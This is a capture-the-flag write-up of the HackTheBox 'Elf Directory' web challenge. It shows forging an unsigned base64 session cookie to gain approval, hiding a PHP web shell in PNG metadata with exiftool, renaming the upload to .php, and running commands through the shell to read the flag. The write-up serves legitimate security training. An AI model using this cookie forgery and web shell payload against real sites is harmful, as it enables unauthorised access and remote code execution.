Elf Directory

Event: Cyber Santa is Coming to Town – 2021 HackTheBox

Category: Web

PTS: 300

Description:

Can you infiltrate the Elf Directory to get a foothold inside Santa’s data warehouse in the North Pole?


We have to infiltrate and find the flag, easier said than done, let’s start checking the website:

There’s not much we can do except for creating a new user and log in with it

As the orange banner remind us we cannot modify nothing nor browse other directory or settings cause we do not have the right permission.
One thing that usually say what you can and cannot do are the cookies


And we have one.

eyJ1c2VybmFtZSI6InVzZXJuYW1lIiwiYXBwcm92ZWQiOmZhbHNlfQ==

The final padding with double “=” suggest a base64 encoding and passing it trough

echo "eyJ1c2VybmFtZSI6InVzZXJuYW1lIiwiYXBwcm92ZWQiOmZhbHNlfQ==" | base64 -d

We’ll get our info:

{"username":"username","approved":false}

Using base64 or cyberchef we’re able to re-encode our data but with a slight modification:

{"username":"username","approved":true}
#encoded
eyJ1c2VybmFtZSI6InVzZXJuYW1lIiwiYXBwcm92ZWQiOnRydWV9

Once replaced the cookie with our new one and refreshed the page the orange alert will disappear.

The easiest thing is trying to upload a PHP shell and abuse it:

But it’s not that easy, we can try some workaround at this problem.
Using exiftool we can modify the metadata of the file – in my case a random png called “couple.png” – without damaging it.

exiftool -DocumentName="<h1>F1uffyGoat<br><?php if(isset(\$_REQUEST['cmd'])){echo '<pre>';\$cmd = (\$_REQUEST['cmd']);system(\$cmd);echo '</pre>';} __halt_compiler();?></h1>" couple.png

Using burp suite we’re going to intercept the upload request and modify the field
“filename” from “couple.png” to “couple.php” and then forward it.

Once uploaded we simply need to browse to that file, using the inspect tool we can easily get the full path of our file


Throwing in as a query field the cmd argument with some bash command:

http://159.65.88.143:31334//uploads/3259f_couple.php?cmd=ls

and scrolling to the end of the page we can see our output:

Now we only need to find the flag with some ls and print it out:

http://159.65.88.143:31334//uploads/3259f_couple.php?cmd=cat%20../../flag_65890d927c37c33.txt